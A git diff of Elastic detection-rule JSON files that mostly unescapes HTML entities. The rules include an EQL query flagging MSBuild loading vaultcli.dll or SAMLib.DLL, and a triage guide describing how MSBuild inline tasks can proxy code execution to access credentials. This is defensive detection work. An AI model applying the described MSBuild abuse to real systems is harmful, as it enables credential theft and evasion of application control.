- Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\") or file.name : (\"vaultcli.dll\", \"SAMLib.DLL\"))]\n", "related_integrations": [ { @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_108.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_108.json index c34a9ef03d0..fd7a6b6a2c4 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_108.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_108.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Trusted Developer Utility", - "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\") or file.name : (\"vaultcli.dll\", \"SAMLib.DLL\"))]\n", "related_integrations": [ { @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -123,7 +123,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_104.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_104.json index b00b17555a9..0c6c49ebcee 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_104.json @@ -56,7 +56,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_105.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_105.json index 9c1929e3628..30bc3cfc985 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_105.json @@ -56,7 +56,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_106.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_106.json index 3b69bb99de0..299cee3f687 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_106.json @@ -56,7 +56,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_206.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_206.json index 55897fc2b28..49eb8b99d47 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_206.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_206.json @@ -66,7 +66,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_207.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_207.json index ec322c743ce..31d1d74fa52 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_207.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_207.json @@ -66,7 +66,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_208.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_208.json index 70040ddbc18..a4c991dd993 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_208.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_208.json @@ -65,7 +65,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_103.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_103.json index 779227b7713..d71d55b337c 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -66,7 +66,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_104.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_104.json index a1e15920161..ab39a969975 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_104.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -65,7 +65,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_105.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_105.json index 55437adccff..bd9d16e8d2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_102.json b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_102.json index da6030d61a6..24d3acbb346 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_102.json +++ b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_102.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_103.json b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_103.json index 395dd4a143c..188a7a14562 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_103.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_104.json b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_104.json index 6d151e7c137..e429f26e0e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_104.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_105.json b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_105.json index 20b89426954..0c15a2116cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_105.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_101.json b/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_101.json index 2781ffb5b4f..57cc0d9b733 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_101.json +++ b/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", 